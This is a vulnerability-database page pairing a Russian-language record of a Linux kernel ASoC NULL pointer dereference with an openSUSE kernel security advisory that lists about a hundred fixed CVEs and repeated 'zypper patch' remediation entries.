"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": "\u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f Linux \u043e\u0442 6.18 \u0434\u043e 6.18.7 , \u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f Linux \u0434\u043e 6.19 rc6 , \u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f Linux \u043e\u0442 6.1 \u0434\u043e 6.12.67 ",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430 ASoC \u044f\u0434\u0440\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u0420\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f NULL (CWE-476)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430 ASoC \u044f\u0434\u0440\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0440\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u0445",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://lore.kernel.org/linux-cve-announce/2026012536-CVE-2026-23006-241b@gregkh/\nhttps://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929\t\nhttps://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed\t\nhttps://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21\t\nhttps://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-476",
"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 4,6)\n\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.1 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 5,5)"
}
OPENSUSE-SU-2026:20287-1
Vulnerability from csaf_opensuse - Published: 2026-02-27 13:03 - Updated: 2026-02-27 13:03Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).
- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).
- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).
- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).
- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).
- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).
- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).
- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).
- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).
- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).
- CVE-2025-71132: smc91x: fix broken irq-context in PREEMPT_RT (bsc#1256737).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" (bsc#1256760).
- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).
- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).
- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22986: gpiolib: fix race condition for gdev->srcu (bsc#1257276).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- Add bugnumber to an existing hv_netvsc change (bsc#1257473).
- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).
- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)
- arm64: Update config files. Disable DEVPORT (bsc#1256792)
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).
- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).
- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).
- drm/imagination: Wait for FW trace update command completion (git-fixes).
- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).
- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).
- net: mana: Support HW link state events (bsc#1253049).
- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).
- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).
- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- tsm-mr: Add TVM Measurement Register support (bsc#1257504).
- tsm-mr: Add tsm-mr sample code (bsc#1257504).
- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).
- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).
- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).
- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).
Patchnames: openSUSE-Leap-16.0-325
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
